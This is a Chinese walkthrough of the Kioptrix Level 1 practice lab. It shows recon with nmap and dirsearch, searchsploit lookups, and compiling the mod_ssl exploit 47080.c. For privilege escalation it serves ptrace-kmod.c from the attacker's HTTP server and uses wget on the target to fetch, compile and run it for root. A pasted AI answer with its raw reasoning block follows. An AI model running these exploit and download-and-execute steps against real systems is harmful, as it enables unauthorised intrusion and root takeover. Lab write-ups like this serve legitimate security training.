Kioptix Level 1靶场渗透测试

声明! 学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)

靶场:Kioptix Level 1靶场渗透测试

攻击机:kali-linux-2024

第一部分:信息收集

1,将两台虚拟机网络连接都改为NAT模式,并查看靶机的MAC地址

2,攻击机上做主机扫描发现靶机

arp-scan -l

靶机IP地址192.168.23.148,攻击机IP地址192.168.23.140

3,扫描靶机端口服务

nmap -sS -sV -n -T4 -p- 192.168.23.148

或者使用nmap的漏洞扫描脚本

nmap --script=vuln 192.168.23.148 -o vuln

4,开放SSH服务的22端口一般没有可利用漏洞,一般获得普通用户权限之后再做横向移动。所以只能访问一下80端口开放的http服务

这是此服务器的默认网页。 Web 服务器软件正在运行,但没有任何内容。

5,没有内容,突破口不在这。可以对网站子目录进行爆破,看看有无隐藏子目录

dirsearch -u 192.168.23.148 -x 404,403

爆破出来几个比较可疑的网站子目录/test.php,/mrtg

访问192.168.23.148/test.php

访问192.168.23.148/mrtg/

突破口大致在这个网页,描述了一些内容大致和MRTG有关

多路由器流量图表绘制工具(Multi Router Traffic Grapher)

多路由器流量图表绘制工具(MRTG)是一种用于监控网络链路流量负载的工具。MRTG会生成包含GIF图像的HTML页面,这些图像能够实时直观地展示流量情况。查看 http://www.ee.ethz.ch/stats/mrtg/ 可获取示例。MRTG基于Perl和C语言编写,可在UNIX和Windows NT系统下运行。MRTG已在网络上的许多站点成功使用。查看MRTG站点地图(MRTG - Site - Map)。

6,没有特别明朗的线索,尝试whatweb扫描网站框架

7,Apche的版本貌似有点低,尝试searchsploit Apache |grep '1.3.20'

两个漏洞存在于windows平台搭建的Apache+PHP服务,不能利用。

8,再搜索openssl 0.9.6b

searchsploit openSSL 0.9.6b

OpenSSL概述

OpenSSL是一个开源的软件库,广泛用于实现SSL(Secure Sockets Layer)和TLS(Transport Layer Security)协议。它不仅提供了加密库,还包含了用于加密、解密、认证和证书管理的工具。OpenSSL支持多种加密算法,包括对称加密和非对称加密,并且可以用于生成和管理数字证书。

9,还有mos_ssl

mod_ssl概述

mod_ssl是一个用于Apache HTTP服务器的模块,它提供了对SSL和TLS协议的支持。SSL(Secure Sockets Layer)和TLS(Transport Layer Security)是用于在网络上加密数据和提供通信双方身份验证的协议。mod_ssl使得Apache服务器能够通过HTTPS协议提供安全的Web服务。

10,一切线索都指向了存在一个公开漏洞

11,将漏洞利用文件导出来利用searchsploit 47080.c -m 

查看一下利用方法

12,然后给漏洞利用程序进行操作

apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

漏洞成功利用

13,接下来就需要进行提权操作,查看一下能不能sudo -l,结果需要密码

14,然后再查看有操作系统内核版本Linux kioptrix.level1 2.4.7-10

而漏洞利用的时候存在一个错误

根据你提供的问题,你正在尝试执行一段命令序列,其中包括下载一个名为“ptrace-kmod.c”的文件,编译它,删除源文件,并最终运行生成的可执行文件。然而,在执行过程中,你遇到了几个问题。

首先,wget命令无法从指定的URL下载文件,因为无法建立SSL连接。这可能是由于网络问题、防火墙设置或URL不正确等原因造成的。

其次,gcc命令无法找到名为“ptrace-kmod.c”的文件,因此无法进行编译。这是因为wget命令未能成功下载该文件,所以它不存在于/tmp目录中。

最后,rm命令也无法删除名为“ptrace-kmod.c”的文件,因为该文件不存在。

要解决这些问题,你可以尝试以下步骤:

  1. 确保你的网络连接正常,并且可以访问外部网站。
  2. 检查防火墙设置,确保允许建立SSL连接。
  3. 确认提供的URL是正确的,并且文件确实存在于该位置。
  4. 如果上述步骤都无效,你可以尝试使用其他下载工具,如curl,来代替wget进行下载。
  5. 如果你仍然无法解决问题,你可以尝试在不同的网络环境中执行命令,或者联系相关网站管理员寻求帮助。

15,那么解决办法就是在kali上面下载这个公开的exp,然后通过http服务将这个exp传入靶机

wget https://github.com/piyush-saurabh/exploits/blob/master/ptrace-kmod.c

然后开启http服务 python -m http.server

16,靶机通过wget方法从攻击机上下载这个exp(从github上面下载也可以)

wget http://192.168.23.140:8000/ptrace-kmod.c

17,在靶机上编译,然后再执行exp成功提权成为root用户

 gcc -o exp ptrace-kmod.c

<think>嗯,用户遇到了Kioptrix Level 1靶场扫描无响应的问题,用的是NAT模式。首先,我需要回想一下常见的原因。可能网络配置有问题,比如虚拟机的网络设置是否正确,是否处于同一网段。然后,用户可能没关闭防火墙或者靶机没正确启动服务。另外,扫描参数是否正确也很重要,比如nmap的参数是否合适。 我记得之前看过引用里的内容,用户用了nmap的-sn参数扫描,但可能没正确指定目标IP。需要确认靶场的IP地址是否在同一个子网下。有时候虚拟机使用NAT模式可能需要端口转发或者检查虚拟网络编辑器的设置,比如VMware的NAT设置是否有问题。 另外,用户提到靶场比较古老,可能Apache和服务的版本较低,是否兼容当前的环境?比如,是否因为服务未启动导致无法响应扫描。还要考虑主机防火墙是否阻止了连接,或者虚拟机的网络适配器是否正确连接。 可能的解决步骤包括:检查虚拟机网络配置,确认IP地址,使用正确的nmap参数(比如-p指定端口范围),关闭防火墙,重启服务等。此外,用户可能需要检查主机和虚拟机之间的连通性,比如ping测试,或者使用ARP扫描来发现靶机。 需要注意的是,有些情况下NAT模式可能需要手动设置静态IP,或者检查DHCP分配。如果扫描时没反应,可能是靶机没有获取到正确的IP,或者主机无法路由到靶机的网络。这时候可能需要检查虚拟网络设置,确保NAT网络配置正确,或者尝试桥接模式看看是否是NAT模式的问题。 还有,用户是否在扫描时使用了正确的目标网段?比如,如果主机在192.168.1.x,而靶机可能分配到了不同的子网,比如192.168.152.x,这时候需要调整扫描的IP范围。此外,nmap的--min-rate参数可能在高版本中需要调整,或者结合其他参数如-Pn来跳过主机发现。 总结下来,解决方案的步骤应该是:确认网络配置、检查IP地址、调整nmap参数、关闭防火墙、验证服务状态,如果不行再考虑更换网络模式或检查虚拟网络设置。</think>### Kioptrix Level 1靶场扫描无响应解决方案 #### 1. 验证网络配置 - **检查虚拟机网络模式**:确认靶机和攻击机(如Kali Linux)均设置为`NAT模式`,并在VMware/VirtualBox的虚拟网络编辑器中确保`NAT子网网段一致`(例如192.168.152.0/24)[^2] - **获取靶机IP**:在靶机启动后登录系统(默认账号`root`/空密码),执行`ifconfig`或`ip addr`获取实际分配的IP地址 #### 2. 优化扫描参数 ```bash nmap -sn 192.168.152.0/24 --min-rate 1000 # 快速扫描存活主机 nmap -Pn -p 1-65535 192.168.152.130 # 跳过主机发现,全端口扫描 ``` #### 3. 常见问题排查 | 问题类型 | 解决方案 | |---------|----------| | 防火墙拦截 | 靶机执行`service iptables stop`关闭防火墙 | | 服务未启动 | 检查`apache`状态:`service httpd status` | | ARP缓存问题 | 攻击机执行`arp-scan -l`扫描本地网络 | #### 4. 网络连通性验证 ```bash ping 靶机IP # 测试基础连通性 telnet 靶机IP 80 # 测试Web服务端口 tcpdump -i eth0 icmp # 抓包分析网络流量 ``` #### 5. 特殊场景处理 - **NAT模式失效**:尝试切换为`桥接模式`后重新扫描 - **DHCP未分配IP**:在VMware虚拟网络编辑器中重置NAT DHCP租约 - **虚拟机冲突**:关闭其他虚拟机避免IP冲突
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值